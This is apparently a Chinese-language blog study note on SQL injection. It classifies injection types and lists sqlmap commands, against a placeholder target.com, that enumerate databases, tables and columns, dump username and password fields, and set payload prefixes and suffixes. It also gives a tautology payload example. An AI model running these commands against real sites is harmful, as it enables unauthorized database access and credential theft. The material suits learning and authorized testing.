select count(*) from admin where usename=‘admin’ and password='password’
select:查询动作
count(*):字段名
admin:表名
usename,password:字段名
‘admin’,‘password’:字段值
注入漏洞分类
1,数字型
数字型注入最多出现在ASP,PHP等弱类型语言中,弱类型语言会自动推导变量类型。而在JAVA,C#这类强类型语言,如果试图把一个字符串转换成int类型,则会抛出异常,无法继续执行。
2,字符串型
数字类型不需要单引号闭合,但是字符串类型一般需要使用单引号来闭合。
字符型注入最关键的是如何闭合SQL语句以及注释多余的代码。
(数据库不同,字符串连接符也不同。如SQL Sever是+ Oracle是|| ,MYSQL是空格。)
POST注入:注入字段在POST数据中
Cookie注入:注入字段在Cookie数据中
时延注入:使用数据库时延特性注入
搜索注入:注入处为搜索点
base64注入:注入的字符串需要经过base64加密
sqlmap
sqlmap -m xxx.txt:从文本中获取多个目标扫描
POST方法
sqlmap -r xx.txt -p username :-r载入一个文件 -p指定特定参数
sqlmap -l log.txt:载入burpsuit log文件
sqlmap -u “url”:设置目标url
sqlmap -u “url” --forms 自动搜索表单方式
-d:sqlmap作为数据库客户端直接连接数据库进行暴库
sqlmao -c sqlmap.conf:扫描配置文件。
查询有哪些数据库
#sqlmap -u “http://www.target.com/show.php?id=1” --dbms mysql --level 3 --dbs
查询test数据库中有哪些表
#sqlmap -u “http://www.target.com/show.php?id=1” --dbms mysql --level 3 -D test --tables
查询test数据库中admin表有哪些字段
#sqlmap -u “http://www.target.com/show.php?id=1” --dbms mysql --level 3 -D test -T admin --columns
dump出字段username与password中的数据
#sqlmap -u “http://www.target.com/show.php?id=1” --dbms mysql --level 3 -D test -T admin -C “username,password” --dump
在baji数据库中搜索字段admin或者password
#sqlmap -r “c:\tools\request.txt” --dbms mysql -D baji–search -C admin,password
–users 列数据库管理用户,当前用户有权限读取包含所有用户的表的权限时,就可以列出所有管理用户。
–banner 查看数据库版本
–dbs 查看所有的库名
–schema 查看information_schema源数据信息
-a 就是all的意思,查看数据库所有信息
–current-user 在大多数据库中可以获取到管理数据的用户。
–is-dba 判断当前的用户是否为管理,是的话会返回True。
–privileges 当前用户有权限读取包含所有用户的表的权限时,很可能列举出每个用户的权限,sqlmap将会告诉你哪个是数据库的超级管理员。也可以用-U参数指定你想看那个用户的权限。
–proxy 指定一个代理服务器 eg: –proxy http://local:8080
select * from users where id=(((‘1’))) and 1=1
–prefix=PREFIX 注入payload字符串前缀
–suffix=SUFFIX 注入payload字符串后缀
eg:sqlmap -u “www.target.com/index.php?id=1” -p id --prefix “’))”
–suffix “AND (‘1’='1”
扫一扫
363
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
